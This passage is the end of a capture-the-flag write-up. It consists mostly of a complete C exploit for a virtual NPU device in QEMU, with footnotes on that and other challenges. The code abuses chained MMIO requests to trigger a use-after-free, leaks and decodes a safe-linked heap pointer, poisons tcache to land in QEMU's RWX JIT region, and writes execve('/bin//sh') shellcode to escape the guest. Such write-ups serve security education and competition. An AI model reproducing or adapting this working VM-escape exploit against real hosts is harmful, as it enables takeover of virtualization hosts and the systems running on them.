#define WRITE_RWV_LEN 0x40
#define WRITE_NOTE_RESIZE 0x100
#define WRITE_NOTE_SCALAR 0x110
#define WRITE_NOTE_PROCESS_RWVEC 0x120

#define STATUS_SUCCESS 0
#define STATUS_UNKNOWN_MMIO 1
#define STATUS_INVALID_RW_SIZE 2
#define STATUS_OUT_OF_RANGE 3
#define STATUS_DMA_FAILED 4

typedef struct {
    uint64_t buf;
    uint16_t ofs;
    uint16_t len;
    uint8_t write;
    uint8_t __unused_13_3[3];
} __attribute__((packed)) RWvec;

#define RWV(buf, ofs, len, write) ((RWvec){ buf, ofs, len, write })

uint8_t *mmio_virt;
uint8_t *mmio_phys;

uint64_t virt2phys(void *p)
{
    uint64_t virt = (uint64_t)p;
    CHECK((virt & 0xfff) == 0);

    int fd = open("/proc/self/pagemap", O_RDONLY);
    PCHECK(fd != -1);

    uint64_t ofs = (virt / 0x1000) * 8;
    PCHECK(lseek(fd, ofs, SEEK_SET) == ofs);

    uint64_t phys;
    PCHECK(read(fd, &phys, 8 ) == 8);
    PCHECK(close(fd) == 0);

    // asserts the bit IS_PRESENT is set
    CHECK(phys & (1ULL << 63));

    // flips out the status bits, and shifts the physical frame address to 64 bits
    phys = (phys & ((1ULL << 54) - 1)) * 0x1000;
    return phys;
}

uint64_t mmio_read(uint64_t addr);

void mmio_assert_success(char *file, int line)
{
    uint8_t status_code = mmio_read(READ_STATUS_CODE);

#define CASE_FAIL(code) \
    case code: \
        printf("mmio_assert_success() failed at %s:%d: %s\n", file, line, #code); \
        abort(); \
        break;

    switch(status_code) {
    case STATUS_SUCCESS:
        break;
    CASE_FAIL(STATUS_UNKNOWN_MMIO)
    CASE_FAIL(STATUS_INVALID_RW_SIZE)
    CASE_FAIL(STATUS_OUT_OF_RANGE)
    CASE_FAIL(STATUS_DMA_FAILED)
    }
#undef CASE_FAIL
}

#define mmio_write(addr, value) _mmio_write(addr, value, __FILE__, __LINE__)
void _mmio_write(uint64_t addr, uint64_t value, char *file, int line)
{
    *((volatile uint64_t*)(mmio_virt + addr)) = value;
    mmio_assert_success(file, line);
}

uint64_t mmio_read(uint64_t addr)
{
    return *((volatile uint64_t*)(mmio_virt + addr));
}

void mmio_open()
{
    // Open and map I/O memory for NPU MMIO
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:02.0/resource0", O_RDWR | O_SYNC);
    PCHECK(mmio_fd != -1)
    mmio_virt = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    PCHECK(mmio_virt != MAP_FAILED)
    PCHECK(close(mmio_fd) == 0);

    // Find NPU MMIO region physical address
    int mmio_res_fd = open("/sys/devices/pci0000:00/0000:00:02.0/resource", O_RDONLY);
    PCHECK(mmio_res_fd != -1)
    char addr_hex[2+16+1] = {0,};
    PCHECK(read(mmio_res_fd, addr_hex, sizeof(addr_hex) - 1) == sizeof(addr_hex) - 1)
    PCHECK(close(mmio_res_fd) == 0);

    mmio_phys = (void*)strtoull(addr_hex, NULL, 16);
}

void *mmap_new(size_t size)
{
    void *map = mmap(0, size, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE | MAP_LOCKED, -1, 0);
    PCHECK(map != MAP_FAILED);
    PCHECK(mlock(map, size) == 0);
    return map;
}

int main(int argc, char *argv[])
{
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    printf("[*] 1. Map MMIO, allocate RWvec array & DMA buffer\n");
    mmio_open();
    printf(" [+] mmio_virt: %p\n", mmio_virt);
    printf(" [+] mmio_phys: %p\n", mmio_phys);

    uint16_t rwv_len;
    RWvec *rwv_virt = mmap_new(0x1000), *rwv_phys = virt2phys(rwv_virt);
    printf(" [+] rwv_virt: %p\n", rwv_virt);
    printf(" [+] rwv_phys: %p\n", rwv_phys);
    mmio_write(WRITE_RWV, rwv_phys);

    // Try to allocate contiguous memory of size 0x10000
    uint8_t *dma_virt = NULL, *dma_phys = NULL;
    for (int i = 0; i < 0x10; i++) {
        uint8_t *map_virt = mmap_new(0x10000), *map_phys = virt2phys(map_virt);
        bool success = true;
        for (int j = 1; j < 0x10; j++) {
            if (virt2phys(map_virt + 0x1000 * j) != map_phys + 0x1000 * j) {
                success = false;
                break;
            }
        }
        if (success) {
            dma_virt = map_virt;
            dma_phys = map_phys;
            printf(" [*] Contiguous PA mmap found in %d tries\n", i);
            break;
        }
    }
    CHECK(dma_virt != NULL);
    printf(" [+] dma_virt: %p\n", dma_virt);
    printf(" [+] dma_phys: %p\n", dma_phys);

    // Allocate note #0 w/ size 0x1000, prepared w/ 0 ~ 0x7ff consts
    printf("[*] 2. Allocate consts note #0\n");
    mmio_write(WRITE_IDX, 0);
    mmio_write(WRITE_LEN_OR_OFS, 0x1000);
    mmio_write(WRITE_NOTE_RESIZE, TRIGGER);
    for (int i = 0; i < 0x800; i++) {
        ((uint16_t*)dma_virt)[i] = i;
    }
    rwv_virt[0] = RWV(dma_phys, 0, 0x1000, 1);
    mmio_write(WRITE_RWV_LEN, 1);
    mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER);

    // Allocate note #1 ~ 0x23 w/ size 0x405
    // Note: 05 04 90 90 90 == add eax, 0x90909004
    printf("[*] 3. Allocate notes #1 ~ 0x23\n");
    mmio_write(WRITE_IDX, 0);
    mmio_write(WRITE_LEN_OR_OFS, 0x405);

    // For heap stability, it is best to do free, leak, allocs in a single RWvec request.
    // Thus, we use chained recursive MMIOs to run arbitrary MMIO operations.
    rwv_len = 0;
    for (int i = 1; i <= 0x23; i++) {
        rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, i*2, 2, 0);        // WRITE_IDX = i
        rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0);  // WRITE_NOTE_RESIZE
    }
    mmio_write(WRITE_RWV_LEN, rwv_len);
    mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER);

    // Mark the chunks for identification (debug)
    mmio_write(WRITE_LEN_OR_OFS, 0x10 - 2);
    for (int i = 1; i <= 0x23; i++) {
        mmio_write(WRITE_IDX, i);
        mmio_write(WRITE_NOTE_SCALAR, i);
    }

    // Leak @ 0x20 with tcache 0x410: 0x22 -> 0x20
    printf("[*] 4. Leak from note #0x20 by UAF\n");
    mmio_write(WRITE_IDX, 0x20);
    mmio_write(WRITE_LEN_OR_OFS, 0x100);
    mmio_write(WRITE_NOTE_SCALAR, 0x20);
    mmio_write(WRITE_LEN_OR_OFS, 0x108);
    mmio_write(WRITE_NOTE_SCALAR, 0x22);
    mmio_write(WRITE_LEN_OR_OFS, 0x110);
    mmio_write(WRITE_NOTE_SCALAR, 0x405);

    mmio_write(WRITE_IDX, 0x80);
    mmio_write(WRITE_LEN_OR_OFS, 0x405);
    mmio_write(WRITE_NOTE_RESIZE, TRIGGER);
    mmio_write(WRITE_LEN_OR_OFS, 0);
    mmio_write(WRITE_NOTE_RESIZE, TRIGGER);

    mmio_write(WRITE_IDX, 0x20);
    rwv_len = 0;
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0);     // WRITE_NOTE_RESIZE (free 0x20)
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, 0x108, 8, 0);         // WRITE_IDX = 0x22
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0);     // WRITE_NOTE_RESIZE (free 0x22)
    rwv_virt[rwv_len++] = RWV(dma_phys, 0, 0x900, 0);                      // Leak heap data (prob (256-9)/256)
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_LEN_OR_OFS, 0x110, 8, 0);  // WRITE_LEN_OR_OFS = 0x405
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0);     // WRITE_NOTE_RESIZE (reclaim 0x22)
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, 0x100, 8, 0);         // WRITE_IDX = 0x20
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0);     // WRITE_NOTE_RESIZE (reclaim 0x20)
    mmio_write(WRITE_RWV_LEN, rwv_len);
    mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER);

    // Mark the chunks for identification (debug)
    mmio_write(WRITE_LEN_OR_OFS, 0x10 - 2);
    mmio_write(WRITE_IDX, 0x20);
    mmio_write(WRITE_NOTE_SCALAR, 0x13370020);
    mmio_write(WRITE_IDX, 0x22);
    mmio_write(WRITE_NOTE_SCALAR, 0x13370022);

    // prot_ptr = ((heap_ptr+0x820)>>12) ^ heap_ptr
    // +0x820 may change 0x???000, so take this into account when decoding.
    uint64_t prot_ptr = *(uint64_t*)(dma_virt + 0x410*2 - 2), heap_ptr = 0;
    uint64_t tcache_key = *(uint64_t*)(dma_virt + 6);
    printf(" [*] tcache_key: %016llx\n", tcache_key);
    printf(" [+] prot_ptr: %p\n", prot_ptr);

    // Technically we have viable pointer leaks inside the leaked data,
    // but this is much more stable & explainable than using random leaks.
    heap_ptr |= prot_ptr & (0xfffULL << 36);
    heap_ptr |= (prot_ptr ^ (heap_ptr >> 12)) & (0xfffULL << 24);
    heap_ptr |= (prot_ptr ^ (heap_ptr >> 12)) & (0xfffULL << 12);
    if (((heap_ptr >> 12) & 0xf) == (prot_ptr & 0xf)) {
        heap_ptr |= (prot_ptr ^ (heap_ptr >> 12)) & 0xfffULL;
    } else if ((((heap_ptr >> 12) + 1) & 0xf) == (prot_ptr & 0xf)) {
        heap_ptr |= (prot_ptr ^ ((heap_ptr >> 12) + 1)) & 0xfffULL;
    } else {
        CHECK(false);
    }
    CHECK((((heap_ptr + 0x820) >> 12) ^ heap_ptr) == prot_ptr);
    printf(" [+] heap_ptr: %p\n", heap_ptr);

    uint64_t rwx = (heap_ptr & ~0xffffffULL) + 0xc000000;
    printf(" [+] TCG RWX: %p\n", rwx);

    // Poison tcache, reclaim & pop shell
    printf("[*] 5. Poison tcache -> reclaim note @ RWX -> write -> shell!\n");
    const uint8_t shellcode[] = {
        0x31, 0xC0, 0x31, 0xF6, 0x31, 0xD2, 0x56, 0x48,
        0xBF, 0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x2F, 0x73,
        0x68, 0x57, 0x54, 0x5F, 0xB0, 0x3B, 0x0F, 0x05
    };
    CHECK(sizeof(shellcode) == 8 * 3);

    uint64_t *dma_virt_u64 = dma_virt;
    uint16_t *dma_virt_u16;

    mmio_write(WRITE_IDX, 0x20);
    dma_virt_u64[0] = 0x20;
    dma_virt_u64[1] = 0x22;
    dma_virt_u64[2] = 0x405;
    dma_virt_u64[3] = 0x9090909090909090;  // nop * 8
    dma_virt_u64[4] = 0x303;
    dma_virt_u64[5] = ((uint64_t*)shellcode)[0];
    dma_virt_u64[6] = 0x303 + 8;
    dma_virt_u64[7] = ((uint64_t*)shellcode)[1];
    dma_virt_u64[8] = 0x303 + 0x10;
    dma_virt_u64[9] = ((uint64_t*)shellcode)[2];
    dma_virt_u16 = dma_virt_u64 + 10;
    for (int i = 0; i < 0x300/8; i++) {
        dma_virt_u16[i] = 3 + i * 8;
    }
    rwv_virt[0] = RWV(dma_phys, 0x100, 80 + 0x300/8*2, 1);
    mmio_write(WRITE_RWV_LEN, 1);
    mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER);

    mmio_write(WRITE_IDX, 0x81);
    mmio_write(WRITE_LEN_OR_OFS, 0x404);
    mmio_write(WRITE_NOTE_RESIZE, TRIGGER);
    mmio_write(WRITE_LEN_OR_OFS, 0);
    mmio_write(WRITE_NOTE_RESIZE, TRIGGER);

    mmio_write(WRITE_IDX, 0x20);
    *(uint64_t*)dma_virt = ((heap_ptr + 0x820) >> 12) ^ rwx;
    rwv_len = 0;
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0);     // WRITE_NOTE_RESIZE (free 0x20)
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, 0x108, 8, 0);         // WRITE_IDX = 0x22
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0);     // WRITE_NOTE_RESIZE (free 0x22)
    rwv_virt[rwv_len++] = RWV(dma_phys, 0x410*2 - 2, 8, 1);                // Poison tcache
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_LEN_OR_OFS, 0x110, 8, 0);  // WRITE_LEN_OR_OFS = 0x405
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0);     // WRITE_NOTE_RESIZE (reclaim 0x22)
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, 0x100, 8, 0);         // WRITE_IDX = 0x20
    rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0);     // WRITE_NOTE_RESIZE (reclaim 0x20 @ RWX)
    for (int i = 0; i < 0x303/8; i++) {
        rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_LEN_OR_OFS, 0x100 + 80 + 2*i, 2, 0);  // WRITE_LEN_OR_OFS = 3+i*8
        rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_SCALAR, 0x118, 8, 0);            // WRITE_NOTE_SCALAR = nop*8
    }
    for (int i = 0; i < 3; i++) {
        rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_LEN_OR_OFS, 0x120 + 0x10*i, 8, 0);    // WRITE_LEN_OR_OFS = 0x303+i*8
        rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_SCALAR, 0x128 + 0x10*i, 8, 0);   // WRITE_NOTE_SCALAR = shellcode
    }
    printf(" [*] rwv_len: 0x%hx\n", rwv_len);
    mmio_write(WRITE_RWV_LEN, rwv_len);
    mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER);

    printf("[!] Shellcode trigger failed, try writing shellcode several more times in vain\n");
    mmio_write(WRITE_IDX, 0x20);
    memset(dma_virt, 0x90, 0x405);
    memcpy(dma_virt + 0x405 - sizeof(shellcode), shellcode, sizeof(shellcode));
    rwv_virt[0] = RWV(dma_phys, 0, 0x405, 1);
    mmio_write(WRITE_RWV_LEN, 1);
    for (int i = 0; i < 0x100000; i++) {
        mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER);
    }

    CHECK(("Unreachable, exploit failed", false));
    return 0;
}
```

</details>

[Xion]: https://twitter.com/0x10n

[^1]: Note that this does not allow arbitrary file writes, since `sanitizeObject()` still uses the buggy regex but only processes keys one at a time recursively, without the split-and-join operation.

[^2]: One might notice that contrary to the response header showing `Content-Length: 0`, the response is actually not empty: the first byte is returned. This is due to internal implementation details irrelevant to this chal, so let's skip this bug.
[^3]: This is intended by the author so that players don't lose their way into finding a nonexistent stack overflow or exploiting the 49 remaining overwritable fields after `stack_guard`. Note the `-fstack-protector-all`!

[^4]: All of this can alternatively be found out by overwriting 2 pointers and re-entering the thread, which aborts with `realloc(): invalid pointer` or `realloc(): invalid old size`, then checking the backtrace with a debugger.

[^5]: TCG buffers are allocated by default with a size of total system memory divided by 8 ([src](https://gitlab.com/qemu-project/qemu/-/blob/v7.1.0-rc3/tcg/region.c#L738)), which may result in a nondeterministic offset between the heap and the RWX region if the buffer size is small. `-accel tcg,tb-size=64` is given to make it deterministic regardless of total system memory to ease exploitation, although technically one could leak the RWX address from the UAF read.